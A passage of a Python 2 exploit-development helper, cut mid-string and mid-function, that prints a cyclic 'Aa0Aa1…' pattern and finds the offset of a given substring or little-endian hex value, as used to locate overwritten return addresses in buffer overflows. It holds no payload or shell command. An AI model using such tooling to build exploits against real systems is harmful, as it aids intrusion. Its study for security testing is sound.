131 | "6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M"
132 | "v3Mv4Mv5Mv6Mv7Mv8Mv9Mw0Mw1Mw2Mw3Mw4Mw5Mw6Mw7Mw8Mw9Mx0Mx1Mx2Mx3Mx4Mx5Mx6Mx7Mx8Mx9"
133 | "My0My1My2My3My4My5My6My7My8My9Mz0Mz1Mz2Mz3Mz4Mz5Mz6Mz7Mz8Mz9Na0Na1Na2Na3Na4Na5Na"
134 | "6Na7Na8Na9Nb0Nb1Nb2Nb3Nb4Nb5Nb6Nb7Nb8Nb9Nc0Nc1Nc2Nc3Nc4Nc5Nc6Nc7Nc8Nc9Nd0Nd1Nd2N"
135 | "d3Nd4Nd5Nd6Nd7Nd8Nd9Ne0Ne1Ne2Ne3Ne4Ne5Ne6Ne7Ne8Ne9Nf0Nf1Nf2Nf3Nf4Nf5Nf6Nf7Nf8Nf9"
136 | "Ng0Ng1Ng2Ng3Ng4Ng5Ng6Ng7Ng8Ng9Nh0Nh1Nh2Nh3Nh4Nh5Nh6Nh7Nh8Nh9Ni0Ni1Ni2Ni3Ni4Ni5Ni"
137 | "6Ni7Ni8Ni9Nj0Nj1Nj2Nj3Nj4Nj5Nj6Nj7Nj8Nj9Nk0Nk1Nk2Nk3Nk4Nk5Nk6Nk7Nk8Nk9Nl0Nl1Nl2N"
138 | "l3Nl4Nl5Nl6Nl7Nl8Nl9Nm0Nm1Nm2Nm3Nm4Nm5Nm6Nm7Nm8Nm9Nn0Nn1Nn2Nn3Nn4Nn5Nn6Nn7Nn8Nn9"
139 | "No0No1No2No3No4No5No6No7No8No9Np0Np1Np2Np3Np4Np5Np6Np7Np8Np9Nq0Nq1Nq2Nq3Nq4Nq5Nq"
140 | "6Nq7Nq8Nq9Nr0Nr1Nr2Nr3Nr4Nr5Nr6Nr7Nr8Nr9Ns0Ns1Ns2Ns3Ns4Ns5Ns6Ns7Ns8Ns9Nt0Nt1Nt2N"
141 | "t3Nt4Nt5Nt6Nt7Nt8Nt9Nu0Nu1Nu2Nu3Nu4Nu5Nu6Nu7Nu8Nu9Nv0Nv1Nv2Nv3Nv4Nv5Nv6Nv7Nv8Nv9"
142 | "Nw0Nw1Nw2Nw3Nw4Nw5Nw6Nw7Nw8Nw9Nx0Nx1Nx2Nx3Nx4Nx5Nx6Nx7Nx8Nx9Ny0Ny1Ny2Ny3Ny4Ny5Ny"
143 | "6Ny7Ny8Ny9Nz0Nz1Nz2Nz3Nz4Nz5Nz6Nz7Nz8Nz9Oa0Oa1Oa2Oa3Oa4Oa5Oa6Oa7Oa8Oa9Ob0Ob1Ob2O"
144 | "b3Ob4Ob5Ob6Ob7Ob8Ob9Oc0Oc1Oc2Oc3Oc4Oc5Oc6Oc7Oc8Oc9Od0Od1Od2Od3Od4Od5Od6Od7Od8Od9"
145 | "Oe0Oe1Oe2Oe3Oe4Oe5Oe6Oe7Oe8Oe9Of0Of1Of2Of3Of4Of5Of6Of7Of8Of9Og0Og1Og2Og3Og4Og5Og"
146 | "6Og7Og8Og9Oh0Oh1Oh2Oh3Oh4Oh5Oh6Oh7Oh8Oh9Oi0Oi1Oi2Oi3Oi4Oi5Oi6Oi7Oi8Oi9Oj0Oj1Oj2O"
147 | "j3Oj4Oj5Oj6Oj7Oj8Oj9Ok0Ok1Ok2Ok3Ok4Ok5Ok6Ok7Ok8Ok9Ol0Ol1Ol2Ol3Ol4Ol5Ol6Ol7Ol8Ol9"
148 | "Om0Om1Om2Om3Om4Om5Om6Om7Om8Om9On0On1On2On3On4On5On6On7On8On9Oo0Oo1Oo2Oo3Oo4Oo5Oo"
149 | "6Oo7Oo8Oo9Op0Op1Op2Op3Op4Op5Op6Op7Op8Op9Oq0Oq1Oq2Oq3Oq4Oq5Oq6Oq7Oq8Oq9Or0Or1Or2O"
150 | "r3Or4Or5Or6Or7Or8Or9Os0Os1Os2Os3Os4Os5Os6Os7Os8Os9Ot0Ot1Ot2Ot3Ot4Ot5Ot6Ot7Ot8Ot9"
151 | "Ou0Ou1Ou2Ou3Ou4Ou5Ou6Ou7Ou8Ou9Ov0Ov1Ov2Ov3Ov4Ov5Ov6Ov7Ov8Ov9Ow0Ow1Ow2Ow3Ow4Ow5Ow"
152 | "6Ow7Ow8Ow9Ox0Ox1Ox2Ox3Ox4Ox5Ox6Ox7Ox8Ox9Oy0Oy1Oy2Oy3Oy4Oy5Oy6Oy7Oy8Oy9Oz0Oz1Oz2O"
153 | "z3Oz4Oz5Oz6Oz7Oz8Oz9Pa0Pa1Pa2Pa3Pa4Pa5Pa6Pa7Pa8Pa9Pb0Pb1Pb2Pb3Pb4Pb5Pb6Pb7Pb8Pb9"
154 | "Pc0Pc1Pc2Pc3Pc4Pc5Pc6Pc7Pc8Pc9Pd0Pd1Pd2Pd3Pd4Pd5Pd6Pd7Pd8Pd9Pe0Pe1Pe2Pe3Pe4Pe5Pe"
155 | "6Pe7Pe8Pe9Pf0Pf1Pf2Pf3Pf4Pf5Pf6Pf7Pf8Pf9Pg0Pg1Pg2Pg3Pg4Pg5Pg6Pg7Pg8Pg9Ph0Ph1Ph2P"
156 | "h3Ph4Ph5Ph6Ph7Ph8Ph9Pi0Pi1Pi2Pi3Pi4Pi5Pi6Pi7Pi8Pi9Pj0Pj1Pj2Pj3Pj4Pj5Pj6Pj7Pj8Pj9"
157 | "Pk0Pk1Pk2Pk3Pk4Pk5Pk6Pk7Pk8Pk9Pl0Pl1Pl2Pl3Pl4Pl5Pl6Pl7Pl8Pl9Pm0Pm1Pm2Pm3Pm4Pm5Pm"
158 | "6Pm7Pm8Pm9Pn0Pn1Pn2Pn3Pn4Pn5Pn6Pn7Pn8Pn9Po0Po1Po2Po3Po4Po5Po6Po7Po8Po9Pp0Pp1Pp2P"
159 | "p3Pp4Pp5Pp6Pp7Pp8Pp9Pq0Pq1Pq2Pq3Pq4Pq5Pq6Pq7Pq8Pq9Pr0Pr1Pr2Pr3Pr4Pr5Pr6Pr7Pr8Pr9"
160 | "Ps0Ps1Ps2Ps3Ps4Ps5Ps6Ps7Ps8Ps9Pt0Pt1Pt2Pt3Pt4Pt5Pt6Pt7Pt8Pt9Pu0Pu1Pu2Pu3Pu4Pu5Pu"
161 | "6Pu7Pu8Pu9Pv0Pv1Pv2Pv3Pv4Pv5Pv6Pv7Pv8Pv9Pw0Pw1Pw2Pw3Pw4Pw5Pw6Pw7Pw8Pw9Px0Px1Px2P"
162 | "x3Px4Px5Px6Px7Px8Px9Py0Py1Py2Py3Py4Py5Py6Py7Py8Py9Pz0Pz1Pz2Pz3Pz4Pz5Pz6Pz7Pz8Pz9"
163 | "Qa0Qa1Qa2Qa3Qa4Qa5Qa6Qa7Qa8Qa9Qb0Qb1Qb2Qb3Qb4Qb5Qb6Qb7Qb8Qb9Qc0Qc1Qc2Qc3Qc4Qc5Qc"
164 | "6Qc7Qc8Qc9Qd0Qd1Qd2Qd3Qd4Qd5Qd6Qd7Qd8Qd9Qe0Qe1Qe2Qe3Qe4Qe5Qe6Qe7Qe8Qe9Qf0Qf1Qf2Q"
165 | "f3Qf4Qf5Qf6Qf7Qf8Qf9Qg0Qg1Qg2Qg3Qg4Qg5Qg6Qg7Qg8Qg9Qh0Qh1Qh2Qh3Qh4Qh5Qh6Qh7Qh8Qh9"
166 | "Qi0Qi1Qi2Qi3Qi4Qi5Qi6Qi7Qi8Qi9Qj0Qj1Qj2Qj3Qj4Qj5Qj6Qj7Qj8Qj9Qk0Qk1Qk2Qk3Qk4Qk5Qk"
167 | "6Qk7Qk8Qk9Ql0Ql1Ql2Ql3Ql4Ql5Ql6Ql7Ql8Ql9Qm0Qm1Qm2Qm3Qm4Qm5Qm6Qm7Qm8Qm9Qn0Qn1Qn2Q"
168 | "n3Qn4Qn5Qn6Qn7Qn8Qn9Qo0Qo1Qo2Qo3Qo4Qo5Qo6Qo7Qo8Qo9Qp0Qp1Qp2Qp3Qp4Qp5Qp6Qp7Qp8Qp9"
169 | "Qq0Qq1Qq2Qq3Qq4Qq5Qq6Qq7Qq8Qq9Qr0Qr1Qr2Qr3Qr4Qr5Qr6Qr7Qr8Qr9Qs0Qs1Qs2Qs3Qs4Qs5Qs"
170 | "6Qs7Qs8Qs9Qt0Qt1Qt2Qt3Qt4Qt5Qt6Qt7Qt8Qt9Qu0Qu1Qu2Qu3Qu4Qu5Qu6Qu7Qu8Qu9Qv0Qv1Qv2Q"
171 | "v3Qv4Qv5Qv6Qv7Qv8Qv9Qw0Qw1Qw2Qw3Qw4Qw5Qw6Qw7Qw8Qw9Qx0Qx1Qx2Qx3Qx4Qx5Qx6Qx7Qx8Qx9"
172 | "Qy0Qy1Qy2Qy3Qy4Qy5Qy6Qy7Qy8Qy9Qz0Qz1Qz2Qz3Qz4Qz5Qz6Qz7Qz8Qz9Ra0Ra1Ra2Ra3Ra4Ra5Ra"
173 | "6Ra7Ra8Ra9Rb0Rb1Rb2Rb3Rb4Rb5Rb6Rb7Rb8Rb9Rc0Rc1Rc2Rc3Rc4Rc5Rc6Rc7Rc8Rc9Rd0Rd1Rd2R"
174 | "d3Rd4Rd5Rd6Rd7Rd8Rd9Re0Re1Re2Re3Re4Re5Re6Re7Re8Re9Rf0Rf1Rf2Rf3Rf4Rf5Rf6Rf7Rf8Rf9"
175 | "Rg0Rg1Rg2Rg3Rg4Rg5Rg6Rg7Rg8Rg9Rh0Rh1Rh2Rh3Rh4Rh5Rh6Rh7Rh8Rh9Ri0Ri1Ri2Ri3Ri4Ri5Ri"
176 | "6Ri7Ri8Ri9Rj0Rj1Rj2Rj3Rj4Rj5Rj6Rj7Rj8Rj9Rk0Rk1Rk2Rk3Rk4Rk5Rk6Rk7Rk8Rk9Rl0Rl1Rl2R"
177 | "l3Rl4Rl5Rl6Rl7Rl8Rl9Rm0Rm1Rm2Rm3Rm4Rm5Rm6Rm7Rm8Rm9Rn0Rn1Rn2Rn3Rn4Rn5Rn6Rn7Rn8Rn9"
178 | "Ro0Ro1Ro2Ro3Ro4Ro5Ro6Ro7Ro8Ro9Rp0Rp1Rp2Rp3Rp4Rp5Rp6Rp7Rp8Rp9Rq0Rq1Rq2Rq3Rq4Rq5Rq"
179 | "6Rq7Rq8Rq9Rr0Rr1Rr2Rr3Rr4Rr5Rr6Rr7Rr8Rr9Rs0Rs1Rs2Rs3Rs4Rs5Rs6Rs7Rs8Rs9Rt0Rt1Rt2R"
180 | "t3Rt4Rt5Rt6Rt7Rt8Rt9Ru0Ru1Ru2Ru3Ru4Ru5Ru6Ru7Ru8Ru9Rv0Rv1Rv2Rv3Rv4Rv5Rv6Rv7Rv8Rv9"
181 | "Rw0Rw1Rw2Rw3Rw4Rw5Rw6Rw7Rw8Rw9Rx0Rx1Rx2Rx3Rx4Rx5Rx6Rx7Rx8Rx9Ry0Ry1Ry2Ry3Ry4Ry5Ry"
182 | "6Ry7Ry8Ry9Rz0Rz1Rz2Rz3Rz4Rz5Rz6Rz7Rz8Rz9Sa0Sa1Sa2Sa3Sa4Sa5Sa6Sa7Sa8Sa9Sb0Sb1Sb2S"
183 | "b3Sb4Sb5Sb6Sb7Sb8Sb9Sc0Sc1Sc2Sc3Sc4Sc5Sc6Sc7Sc8Sc9Sd0Sd1Sd2Sd3Sd4Sd5Sd6Sd7Sd8Sd9"
184 | "Se0Se1Se2Se3Se4Se5Se6Se7Se8Se9Sf0Sf1Sf2Sf3Sf4Sf5Sf6Sf7Sf8Sf9Sg0Sg1Sg2Sg3Sg4Sg5Sg"
185 | "6Sg7Sg8Sg9Sh0Sh1Sh2Sh3Sh4Sh5Sh6Sh7Sh8Sh9Si0Si1Si2Si3Si4Si5Si6Si7Si8Si9Sj0Sj1Sj2S"
186 | "j3Sj4Sj5Sj6Sj7Sj8Sj9Sk0Sk1Sk2Sk3Sk4Sk5Sk6Sk7Sk8Sk9Sl0Sl1Sl2Sl3Sl4Sl5Sl6Sl7Sl8Sl9"
187 | "Sm0Sm1Sm2Sm3Sm4Sm5Sm6Sm7Sm8Sm9Sn0Sn1Sn2Sn3Sn4Sn5Sn6Sn7Sn8Sn9So0So1So2So3So4So5So"
188 | "6So7So8So9Sp0Sp1Sp2Sp3Sp4Sp5Sp6Sp7Sp8Sp9Sq0Sq1Sq2Sq3Sq4Sq5Sq6Sq7Sq8Sq9Sr0Sr1Sr2S"
189 | "r3Sr4Sr5Sr6Sr7Sr8Sr9Ss0Ss1Ss2Ss3Ss4Ss5Ss6Ss7Ss8Ss9St0St1St2St3St4St5St6St7St8St9"
190 | "Su0Su1Su2Su3Su4Su5Su6Su7Su8Su9Sv0Sv1Sv2Sv3Sv4Sv5Sv6Sv7Sv8Sv9Sw0Sw1Sw2Sw3Sw4Sw5Sw"
191 | "6Sw7Sw8Sw9Sx0Sx1Sx2Sx3Sx4Sx5Sx6Sx7Sx8Sx9Sy0Sy1Sy2Sy3Sy4Sy5Sy6Sy7Sy8Sy9Sz0Sz1Sz2S"
192 | "z3Sz4Sz5Sz6Sz7Sz8Sz9Ta0Ta1Ta2Ta3Ta4Ta5Ta6Ta7Ta8Ta9Tb0Tb1Tb2Tb3Tb4Tb5Tb6Tb7Tb8Tb9"
193 | "Tc0Tc1Tc2Tc3Tc4Tc5Tc6Tc7Tc8Tc9Td0Td1Td2Td3Td4Td5Td6Td7Td8Td9Te0Te1Te2Te3Te4Te5Te"
194 | "6Te7Te8Te9Tf0Tf1Tf2Tf3Tf4Tf5Tf6Tf7Tf8Tf9Tg0Tg1Tg2Tg3Tg4Tg5Tg6Tg7Tg8Tg9Th0Th1Th2T"
195 | "h3Th4Th5Th6Th7Th8Th9Ti0Ti1Ti2Ti3Ti4Ti5Ti6Ti7Ti8Ti9Tj0Tj1Tj2Tj3Tj4Tj5Tj6Tj7Tj8Tj9"
196 | "Tk0Tk1Tk2Tk3Tk4Tk5Tk6Tk7Tk8Tk9Tl0Tl1Tl2Tl3Tl4Tl5Tl6Tl7Tl8Tl9Tm0Tm1Tm2Tm3Tm4Tm5Tm"
197 | "6Tm7Tm8Tm9Tn0Tn1Tn2Tn3Tn4Tn5Tn6Tn7Tn8Tn9To0To1To2To3To4To5To6To7To8To9Tp0Tp1Tp2T"
198 | "p3Tp4Tp5Tp6Tp7Tp8Tp9Tq0Tq1Tq2Tq3Tq4Tq5Tq6Tq7Tq8Tq9Tr0Tr1Tr2Tr3Tr4Tr5Tr6Tr7Tr8Tr9"
199 | "Ts0Ts1Ts2Ts3Ts4Ts5Ts6Ts7Ts8Ts9Tt0Tt1Tt2Tt3Tt4Tt5Tt6Tt7Tt8Tt9Tu0Tu1Tu2Tu3Tu4Tu5Tu"
200 | "6Tu7Tu8Tu9Tv0Tv1Tv2Tv3Tv4Tv5Tv6Tv7Tv8Tv9Tw0Tw1Tw2Tw3Tw4Tw5Tw6Tw7Tw8Tw9Tx0Tx1Tx2T"
201 | "x3Tx4Tx5Tx6Tx7Tx8Tx9Ty0Ty1Ty2Ty3Ty4Ty5Ty6Ty7Ty8Ty9Tz0Tz1Tz2Tz3Tz4Tz5Tz6Tz7Tz8Tz9"
202 | "Ua0Ua1Ua2Ua3Ua4Ua5Ua6Ua7Ua8Ua9Ub0Ub1Ub2Ub3Ub4Ub5Ub6Ub7Ub8Ub9Uc0Uc1Uc2Uc3Uc4Uc5Uc"
203 | "6Uc7Uc8Uc9Ud0Ud1Ud2Ud3Ud4Ud5Ud6Ud7Ud8Ud9Ue0Ue1Ue2Ue3Ue4Ue5Ue6Ue7Ue8Ue9Uf0Uf1Uf2U"
204 | "f3Uf4Uf5Uf6Uf7Uf8Uf9Ug0Ug1Ug2Ug3Ug4Ug5Ug6Ug7Ug8Ug9Uh0Uh1Uh2Uh3Uh4Uh5Uh6Uh7Uh8Uh9"
205 | "Ui0Ui1Ui2Ui3Ui4Ui5Ui6Ui7Ui8Ui9Uj0Uj1Uj2Uj3Uj4Uj5Uj6Uj7Uj8Uj9Uk0Uk1Uk2Uk3Uk4Uk5Uk"
206 | "6Uk7Uk8Uk9Ul0Ul1Ul2Ul3Ul4Ul5Ul6Ul7Ul8Ul9Um0Um1Um2Um3Um4Um5Um6Um7Um8Um9Un0Un1Un2U"
207 | "n3Un4Un5Un6Un7Un8Un9Uo0Uo1Uo2Uo3Uo4Uo5Uo6Uo7Uo8Uo9Up0Up1Up2Up3Up4Up5Up6Up7Up8Up9"
208 | "Uq0Uq1Uq2Uq3Uq4Uq5Uq6Uq7Uq8Uq9Ur0Ur1Ur2Ur3Ur4Ur5Ur6Ur7Ur8Ur9Us0Us1Us2Us3Us4Us5Us"
209 | "6Us7Us8Us9Ut0Ut1Ut2Ut3Ut4Ut5Ut6Ut7Ut8Ut9Uu0Uu1Uu2Uu3Uu4Uu5Uu6Uu7Uu8Uu9Uv0Uv1Uv2U"
210 | "v3Uv4Uv5Uv6Uv7Uv8Uv9Uw0Uw1Uw2Uw3Uw4Uw5Uw6Uw7Uw8Uw9Ux0Ux1Ux2Ux3Ux4Ux5Ux6Ux7Ux8Ux9"
211 | "Uy0Uy1Uy2Uy3Uy4Uy5Uy6Uy7Uy8Uy9Uz0Uz1Uz2Uz3Uz4Uz5Uz6Uz7Uz8Uz9Va0Va1Va2Va3Va4Va5Va"
212 | "6Va7Va8Va9Vb0Vb1Vb2Vb3Vb4Vb5Vb6Vb7Vb8Vb9Vc0Vc1Vc2Vc3Vc4Vc5Vc6Vc7Vc8Vc9Vd0Vd1Vd2V"
213 | "d3Vd4Vd5Vd6Vd7Vd8Vd9Ve0Ve1Ve2Ve3Ve4Ve5Ve6Ve7Ve8Ve9Vf0Vf1Vf2Vf3Vf4Vf5Vf6Vf7Vf8Vf9"
214 | "Vg0Vg1Vg2Vg3Vg4Vg5Vg6Vg7Vg8Vg9Vh0Vh1Vh2Vh3Vh4Vh5Vh6Vh7Vh8Vh9Vi0Vi1Vi2Vi3Vi4Vi5Vi"
215 | "6Vi7Vi8Vi9Vj0Vj1Vj2Vj3Vj4Vj5Vj6Vj7Vj8Vj9Vk0Vk1Vk2Vk3Vk4Vk5Vk6Vk7Vk8Vk9Vl0Vl1Vl2V"
216 | "l3Vl4Vl5Vl6Vl7Vl8Vl9Vm0Vm1Vm2Vm3Vm4Vm5Vm6Vm7Vm8Vm9Vn0Vn1Vn2Vn3Vn4Vn5Vn6Vn7Vn8Vn9"
217 | "Vo0Vo1Vo2Vo3Vo4Vo5Vo6Vo7Vo8Vo9Vp0Vp1Vp2Vp3Vp4Vp5Vp6Vp7Vp8Vp9Vq0Vq1Vq2Vq3Vq4Vq5Vq"
218 | "6Vq7Vq8Vq9Vr0Vr1Vr2Vr3Vr4Vr5Vr6Vr7Vr8Vr9Vs0Vs1Vs2Vs3Vs4Vs5Vs6Vs7Vs8Vs9Vt0Vt1Vt2V"
219 | "t3Vt4Vt5Vt6Vt7Vt8Vt9Vu0Vu1Vu2Vu3Vu4Vu5Vu6Vu7Vu8Vu9Vv0Vv1Vv2Vv3Vv4Vv5Vv6Vv7Vv8Vv9"
220 | "Vw0Vw1Vw2Vw3Vw4Vw5Vw6Vw7Vw8Vw9Vx0Vx1Vx2Vx3Vx4Vx5Vx6Vx7Vx8Vx9Vy0Vy1Vy2Vy3Vy4Vy5Vy"
221 | "6Vy7Vy8Vy9Vz0Vz1Vz2Vz3Vz4Vz5Vz6Vz7Vz8Vz9Wa0Wa1Wa2Wa3Wa4Wa5Wa6Wa7Wa8Wa9Wb0Wb1Wb2W"
222 | "b3Wb4Wb5Wb6Wb7Wb8Wb9Wc0Wc1Wc2Wc3Wc4Wc5Wc6Wc7Wc8Wc9Wd0Wd1Wd2Wd3Wd4Wd5Wd6Wd7Wd8Wd9"
223 | "We0We1We2We3We4We5We6We7We8We9Wf0Wf1Wf2Wf3Wf4Wf5Wf6Wf7Wf8Wf9Wg0Wg1Wg2Wg3Wg4Wg5Wg"
224 | "6Wg7Wg8Wg9Wh0Wh1Wh2Wh3Wh4Wh5Wh6Wh7Wh8Wh9Wi0Wi1Wi2Wi3Wi4Wi5Wi6Wi7Wi8Wi9Wj0Wj1Wj2W"
225 | "j3Wj4Wj5Wj6Wj7Wj8Wj9Wk0Wk1Wk2Wk3Wk4Wk5Wk6Wk7Wk8Wk9Wl0Wl1Wl2Wl3Wl4Wl5Wl6Wl7Wl8Wl9"
226 | "Wm0Wm1Wm2Wm3Wm4Wm5Wm6Wm7Wm8Wm9Wn0Wn1Wn2Wn3Wn4Wn5Wn6Wn7Wn8Wn9Wo0Wo1Wo2Wo3Wo4Wo5Wo"
227 | "6Wo7Wo8Wo9Wp0Wp1Wp2Wp3Wp4Wp5Wp6Wp7Wp8Wp9Wq0Wq1Wq2Wq3Wq4Wq5Wq6Wq7Wq8Wq9Wr0Wr1Wr2W"
228 | "r3Wr4Wr5Wr6Wr7Wr8Wr9Ws0Ws1Ws2Ws3Ws4Ws5Ws6Ws7Ws8Ws9Wt0Wt1Wt2Wt3Wt4Wt5Wt6Wt7Wt8Wt9"
229 | "Wu0Wu1Wu2Wu3Wu4Wu5Wu6Wu7Wu8Wu9Wv0Wv1Wv2Wv3Wv4Wv5Wv6Wv7Wv8Wv9Ww0Ww1Ww2Ww3Ww4Ww5Ww"
230 | "6Ww7Ww8Ww9Wx0Wx1Wx2Wx3Wx4Wx5Wx6Wx7Wx8Wx9Wy0Wy1Wy2Wy3Wy4Wy5Wy6Wy7Wy8Wy9Wz0Wz1Wz2W"
231 | "z3Wz4Wz5Wz6Wz7Wz8Wz9Xa0Xa1Xa2Xa3Xa4Xa5Xa6Xa7Xa8Xa9Xb0Xb1Xb2Xb3Xb4Xb5Xb6Xb7Xb8Xb9"
232 | "Xc0Xc1Xc2Xc3Xc4Xc5Xc6Xc7Xc8Xc9Xd0Xd1Xd2Xd3Xd4Xd5Xd6Xd7Xd8Xd9Xe0Xe1Xe2Xe3Xe4Xe5Xe"
233 | "6Xe7Xe8Xe9Xf0Xf1Xf2Xf3Xf4Xf5Xf6Xf7Xf8Xf9Xg0Xg1Xg2Xg3Xg4Xg5Xg6Xg7Xg8Xg9Xh0Xh1Xh2X"
234 | "h3Xh4Xh5Xh6Xh7Xh8Xh9Xi0Xi1Xi2Xi3Xi4Xi5Xi6Xi7Xi8Xi9Xj0Xj1Xj2Xj3Xj4Xj5Xj6Xj7Xj8Xj9"
235 | "Xk0Xk1Xk2Xk3Xk4Xk5Xk6Xk7Xk8Xk9Xl0Xl1Xl2Xl3Xl4Xl5Xl6Xl7Xl8Xl9Xm0Xm1Xm2Xm3Xm4Xm5Xm"
236 | "6Xm7Xm8Xm9Xn0Xn1Xn2Xn3Xn4Xn5Xn6Xn7Xn8Xn9Xo0Xo1Xo2Xo3Xo4Xo5Xo6Xo7Xo8Xo9Xp0Xp1Xp2X"
237 | "p3Xp4Xp5Xp6Xp7Xp8Xp9Xq0Xq1Xq2Xq3Xq4Xq5Xq6Xq7Xq8Xq9Xr0Xr1Xr2Xr3Xr4Xr5Xr6Xr7Xr8Xr9"
238 | "Xs0Xs1Xs2Xs3Xs4Xs5Xs6Xs7Xs8Xs9Xt0Xt1Xt2Xt3Xt4Xt5Xt6Xt7Xt8Xt9Xu0Xu1Xu2Xu3Xu4Xu5Xu"
239 | "6Xu7Xu8Xu9Xv0Xv1Xv2Xv3Xv4Xv5Xv6Xv7Xv8Xv9Xw0Xw1Xw2Xw3Xw4Xw5Xw6Xw7Xw8Xw9Xx0Xx1Xx2X"
240 | "x3Xx4Xx5Xx6Xx7Xx8Xx9Xy0Xy1Xy2Xy3Xy4Xy5Xy6Xy7Xy8Xy9Xz0Xz1Xz2Xz3Xz4Xz5Xz6Xz7Xz8Xz9"
241 | "Ya0Ya1Ya2Ya3Ya4Ya5Ya6Ya7Ya8Ya9Yb0Yb1Yb2Yb3Yb4Yb5Yb6Yb7Yb8Yb9Yc0Yc1Yc2Yc3Yc4Yc5Yc"
242 | "6Yc7Yc8Yc9Yd0Yd1Yd2Yd3Yd4Yd5Yd6Yd7Yd8Yd9Ye0Ye1Ye2Ye3Ye4Ye5Ye6Ye7Ye8Ye9Yf0Yf1Yf2Y"
243 | "f3Yf4Yf5Yf6Yf7Yf8Yf9Yg0Yg1Yg2Yg3Yg4Yg5Yg6Yg7Yg8Yg9Yh0Yh1Yh2Yh3Yh4Yh5Yh6Yh7Yh8Yh9"
244 | "Yi0Yi1Yi2Yi3Yi4Yi5Yi6Yi7Yi8Yi9Yj0Yj1Yj2Yj3Yj4Yj5Yj6Yj7Yj8Yj9Yk0Yk1Yk2Yk3Yk4Yk5Yk"
245 | "6Yk7Yk8Yk9Yl0Yl1Yl2Yl3Yl4Yl5Yl6Yl7Yl8Yl9Ym0Ym1Ym2Ym3Ym4Ym5Ym6Ym7Ym8Ym9Yn0Yn1Yn2Y"
246 | "n3Yn4Yn5Yn6Yn7Yn8Yn9Yo0Yo1Yo2Yo3Yo4Yo5Yo6Yo7Yo8Yo9Yp0Yp1Yp2Yp3Yp4Yp5Yp6Yp7Yp8Yp9"
247 | "Yq0Yq1Yq2Yq3Yq4Yq5Yq6Yq7Yq8Yq9Yr0Yr1Yr2Yr3Yr4Yr5Yr6Yr7Yr8Yr9Ys0Ys1Ys2Ys3Ys4Ys5Ys"
248 | "6Ys7Ys8Ys9Yt0Yt1Yt2Yt3Yt4Yt5Yt6Yt7Yt8Yt9Yu0Yu1Yu2Yu3Yu4Yu5Yu6Yu7Yu8Yu9Yv0Yv1Yv2Y"
249 | "v3Yv4Yv5Yv6Yv7Yv8Yv9Yw0Yw1Yw2Yw3Yw4Yw5Yw6Yw7Yw8Yw9Yx0Yx1Yx2Yx3Yx4Yx5Yx6Yx7Yx8Yx9"
250 | "Yy0Yy1Yy2Yy3Yy4Yy5Yy6Yy7Yy8Yy9Yz0Yz1Yz2Yz3Yz4Yz5Yz6Yz7Yz8Yz9Za0Za1Za2Za3Za4Za5Za"
251 | "6Za7Za8Za9Zb0Zb1Zb2Zb3Zb4Zb5Zb6Zb7Zb8Zb9Zc0Zc1Zc2Zc3Zc4Zc5Zc6Zc7Zc8Zc9Zd0Zd1Zd2Z"
252 | "d3Zd4Zd5Zd6Zd7Zd8Zd9Ze0Ze1Ze2Ze3Ze4Ze5Ze6Ze7Ze8Ze9Zf0Zf1Zf2Zf3Zf4Zf5Zf6Zf7Zf8Zf9"
253 | "Zg0Zg1Zg2Zg3Zg4Zg5Zg6Zg7Zg8Zg9Zh0Zh1Zh2Zh3Zh4Zh5Zh6Zh7Zh8Zh9Zi0Zi1Zi2Zi3Zi4Zi5Zi"
254 | "6Zi7Zi8Zi9Zj0Zj1Zj2Zj3Zj4Zj5Zj6Zj7Zj8Zj9Zk0Zk1Zk2Zk3Zk4Zk5Zk6Zk7Zk8Zk9Zl0Zl1Zl2Z"
255 | "l3Zl4Zl5Zl6Zl7Zl8Zl9Zm0Zm1Zm2Zm3Zm4Zm5Zm6Zm7Zm8Zm9Zn0Zn1Zn2Zn3Zn4Zn5Zn6Zn7Zn8Zn9"
256 | "Zo0Zo1Zo2Zo3Zo4Zo5Zo6Zo7Zo8Zo9Zp0Zp1Zp2Zp3Zp4Zp5Zp6Zp7Zp8Zp9Zq0Zq1Zq2Zq3Zq4Zq5Zq"
257 | "6Zq7Zq8Zq9Zr0Zr1Zr2Zr3Zr4Zr5Zr6Zr7Zr8Zr9Zs0Zs1Zs2Zs3Zs4Zs5Zs6Zs7Zs8Zs9Zt0Zt1Zt2Z"
258 | "t3Zt4Zt5Zt6Zt7Zt8Zt9Zu0Zu1Zu2Zu3Zu4Zu5Zu6Zu7Zu8Zu9Zv0Zv1Zv2Zv3Zv4Zv5Zv6Zv7Zv8Zv9"
259 | "Zw0Zw1Zw2Zw3Zw4Zw5Zw6Zw7Zw8Zw9Zx0Zx1Zx2Zx3Zx4Zx5Zx6Zx7Zx8Zx9Zy0Zy1Zy2Zy3Zy4Zy5Zy"
260 | "6Zy7Zy8Zy9Zz0Zz1Zz2Zz3Zz4Zz5Zz6Zz7Zz8Zz9"
261 | )
262 | 
263 | def show_help():
264 | 	print sys.argv[0] + " create <int>"
265 | 	print "\tReturns a pattern of <int> chars."
266 | 	print
267 | 	print sys.argv[0] + " offset <str> [size <int>]"
268 | 	print (
269 | 		"\tReturns the offset for the provided argument <str>. Must be at least "
270 | 		"three chars for non ambiguous match. May be a hex value. The conversion"
271 | 		"is done automatically for little endian architectures (ie: x86). This "
272 | 		"basically means that the string obtained from hex conversion is "
273 | 		"reversed. WARNING: The hex decoding is skipped for valid hex values "
274 | 		"that are part of the buffer itself as the hex decoding is a fallback "
275 | 		"measure. Always use the 0x prefix in order to force the hex decoding."
276 | 		"" + os.linesep + ""
277 | 		"\tFor patterns longer than 20280 chars you must provide the optional "
278 | 		"argument size in order to receive all the offsets for the Aa0 pattern."
279 | 	)
280 | 	sys.exit(0)
281 | 
282 | def show_pattern(size):
283 | 	size = int(size)
284 | 	count = size // 20280
285 | 	inc = 0
286 | 	while inc < count:
287 | 		sys.stdout.write(buf)
288 | 		inc += 1
289 | 	
290 | 	mod = size % 20280
291 | 	sys.stdout.write(buf[:mod])
292 | 	print
293 | 	
294 | def decode_offset(offset):
295 | 	offset = offset.replace("0x", "")
296 | 	try:
297 | 		offset = binascii.unhexlify(offset)
298 | 		offset = offset[::-1]
299 | 		print "hex pattern decoded as: " + offset
300 | 		return offset
301 | 	except TypeError:
302 | 		sploit.show_error("Invalid input offset.")
303 | 
304 | def show_offset(offset, size):
305 | 	try:
306 | 		pos = buf.index(offset)
307 | 		if size == 0:
308 | 			print pos
309 | 		else:
310 | 			position = list()
311 | 			count = size // 20280
312 | 			inc = 0
